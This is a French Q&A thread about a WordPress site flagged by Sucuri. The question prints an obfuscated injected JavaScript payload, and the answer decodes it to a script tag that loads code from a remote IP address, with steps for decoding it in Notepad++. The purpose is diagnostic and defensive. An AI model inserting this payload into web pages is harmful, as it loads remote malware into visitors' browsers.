web-dev-qa-db-fra.com

Sucuri détecte les logiciels malveillants sur wordpress mais je ne trouve pas le code malveillant

Hier, j'ai reçu un rapport nous demandant de vérifier un site Web wordpress parce que l'antivirus de la personne a bloqué ledit site Web.

J'ai exécuté le Sucuri Site Check et il détecte en effet les logiciels malveillants:

"Malware javascript connu: malware.injection? 39"

<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

J'ai désactivé le Web et téléchargé tout le code source. Mais quand j'essaye de chercher le code malveillant ... je ne trouve rien. Je recherche dans tous les fichiers et je ne détecte rien.

Que puis-je faire? Toute aide serait appréciée.

9
amagali

Le malware en question est hébergé ailleurs et est (probablement) ajouté par cross-site-scripting (XSS). Si vous regardez la partie "var src", vous verrez une longue chaîne de texte encodé en Base64:

ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=

Une fois décodé, cela se révèle être le suivant:

document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%39%33%2E%32%33%38%2E%34%36%2E%35%37%2F%6D%52%50%50%7A%43%22%3E%3C%2F%73%63%72%69%70%74%3E'));

document.write ajoute le code spécifié dans le DOM. Le décodage URL de la partie à l'intérieur de "unescape" entraîne la balise de script suivante (espaces ajoutés pour la casser):

<script src="http://193.238.46.57/            mRPPzC"></script>

Ainsi, le malware est probablement hébergé sur CETTE URL (quel qu'il soit) et est injecté dans la page via le document.write commande.


n guide rapide sur la façon dont j'ai fait cela

  1. Installez Notepad ++.
  2. Assurez-vous que le plugin Mime tools est installé (peut-être par défaut?)
  3. Copiez la chaîne encodée en Base64 dans un nouveau fichier et sélectionnez le texte.
  4. Sous "Plugins", sélectionnez "Outils MIME" -> Base 64 Decode
  5. Copiez et collez la pièce dans unescape sur une nouvelle ligne
  6. Sélectionnez la nouvelle ligne, puis sélectionnez "Plugins" -> Outils MIME -> Décodage URL
15
Philip Rowlands